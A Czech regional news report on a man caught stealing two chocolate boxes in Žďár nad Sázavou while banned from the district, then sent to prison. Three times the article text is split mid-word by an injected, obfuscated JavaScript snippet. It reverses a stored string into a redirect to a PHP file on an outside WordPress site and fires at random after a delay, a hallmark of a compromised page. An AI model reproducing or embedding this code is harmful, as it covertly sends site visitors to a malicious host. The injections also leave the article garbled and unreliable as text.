Rainbow page separator

Vyhýbal se vězení, policisté ho dopadli po krádeži bonboniér

Pondělí, 10. září 2018

Žďár nad Sázavou / Sedmapadesátiletému muži z Havlíčkobrodska sdělili žďárští policisté podezření ze spáchání dvou trestných činů. Jednak čelí podezření, že v jedné ze žďárských prodejen odcizil zboží, navíc se zdržoval ve žďárském okrese, ačkoli mu byl uložen trest zákazu pobytu na [„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tom[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to území.
„Muž ve středu 5. září v prodejně obchodního řetězce v ulici Horní odcizil dvě bonboniéry a z prodejny odešel bez zaplacení. Policejní hlídka ho vypátrala a zadržela na náměstí Republiky, kde ležel na lavičce. Policisté zjistili, že se jedná o muže z Havlíčkobrodska, kterému byl okresním soudem uložen tříletý trest zákazu pobytu na území okresu Žďár nad Sázavou s předpokládaným koncem v polovině roku 2021,“ informovala policejní mluvčí Stanislava Miláčková.
Dále policisté zjistili, že okresní soud v polovině srpna na muže vydal příkaz k dodání do výkonu trestu odnětí svobody, pročež ho eskor[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tovali do věznice.
„Muž byl již v minulosti soudně trestán za majetkovou trestnou činnost, kdy mu byl v několika případech uložen nepodmíněný trest odnětí svobody. Z výkonu posledního trestu se vrátil v lednu. V polovině srpna mu byl za majetkovou trestnou činnost uložen další nepodmíněný trest odnětí svobody, a [„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to na dobu devíti měsíců,“ přiblížila Miláčková.